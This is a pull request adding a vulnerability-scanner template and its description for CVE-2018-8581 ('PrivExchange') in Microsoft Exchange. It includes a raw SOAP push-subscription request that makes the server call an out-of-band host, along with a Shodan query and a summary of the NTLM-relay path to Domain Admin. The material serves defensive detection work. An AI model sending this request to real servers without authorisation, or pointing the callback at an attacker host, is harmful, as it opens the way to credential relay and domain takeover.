### PR TITLE
Add CVE-2018-8581 Microsoft Exchange Server SSRF template

### DIFF
--- a/http/cves/2018/CVE-2018-8581.yaml
+++ b/http/cves/2018/CVE-2018-8581.yaml
@@ -1,0 +1,114 @@
+id: CVE-2018-8581
+
+info:
+  name: Microsoft Exchange Server - SSRF/Privilege Escalation
+  author: njg7194
+  severity: high
+  description: |
+    An elevation of privilege vulnerability exists in Microsoft Exchange Server. An attacker who successfully exploited this vulnerability could attempt to impersonate any other user of the Exchange server. To exploit the vulnerability, an attacker would need to execute a man-in-the-middle attack to forward an authentication request to a Microsoft Exchange Server, thereby allowing impersonation of another Exchange user.
+  impact: |
+    An attacker can relay NTLM authentication to Active Directory and gain elevated privileges, potentially compromising the entire domain.
+  remediation: |
+    Apply the security updates provided by Microsoft. Additionally, disable EWS push notifications or implement Extended Protection for Authentication (EPA).
+  reference:
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
+    - https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
+    - https://github.com/dirkjanm/PrivExchange
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8581
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.4
+    cve-id: CVE-2018-8581
+    cwe-id: CWE-918
+    epss-score: 0.97188
+    epss-percentile: 0.99853
+    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 2
+    vendor: microsoft
+    product: exchange_server
+    shodan-query: http.title:"Outlook Web App"
+    fofa-query: app="Microsoft-Exchange"
+  tags: cve2018,cve,microsoft,exchange,ssrf,privesc,kev
+
+http:
+  - raw:
+      - |
+        GET /ews/exchange.asmx HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ExchangeServiceBinding"
+          - "ServerVersionInfo"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "X-OWA-Version"
+          - "X-FEServer"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+          - 401
+
+  - raw:
+      - |
+        POST /EWS/Exchange.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml; charset=utf-8
+        SOAPAction: "http://schemas.microsoft.com/exchange/services/2006/messages/Subscribe"
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+
+        <?xml version="1.0" encoding="utf-8"?>
+        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
+                       xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
+                       xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
+          <soap:Body>
+            <m:Subscribe>
+              <m:PushSubscriptionRequest>
+                <t:FolderIds>
+                  <t:DistinguishedFolderId Id="inbox"/>
+                </t:FolderIds>
+                <t:EventTypes>
+                  <t:EventType>NewMailEvent</t:EventType>
+                </t:EventTypes>
+                <t:StatusFrequency>1</t:StatusFrequency>
+                <t:URL>http://{{interactsh-url}}</t:URL>
+              </m:PushSubscriptionRequest>
+            </m:Subscribe>
+          </soap:Body>
+        </soap:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SubscribeResponse"
+          - "SubscriptionId"
+        condition: or
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - '<t:SubscriptionId>([^<]+)</t:SubscriptionId>'
+# digest: automated-template


### PR DESCRIPTION
## Summary

Adds detection template for CVE-2018-8581 (Microsoft Exchange Server SSRF/Privilege Escalation)

## Description

This template detects the vulnerability known as "PrivExchange" which allows an attacker to:
- Trigger NTLM authentication from Exchange to an attacker-controlled server
- Relay those credentials to Active Directory
- Potentially gain Domain Admin privileges

## Detection Methods

1. **EWS Endpoint Detection**: Checks for Exchange Web Services availability
2. **Push Subscription SSRF**: Attempts to create a push subscription with an external URL (using interactsh for OOB detection)

## References

- https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
- https://github.com/dirkjanm/PrivExchange
- https://nvd.nist.gov/vuln/detail/CVE-2018-8581

## Closes

Closes #14576

💎 Bounty submission via Algora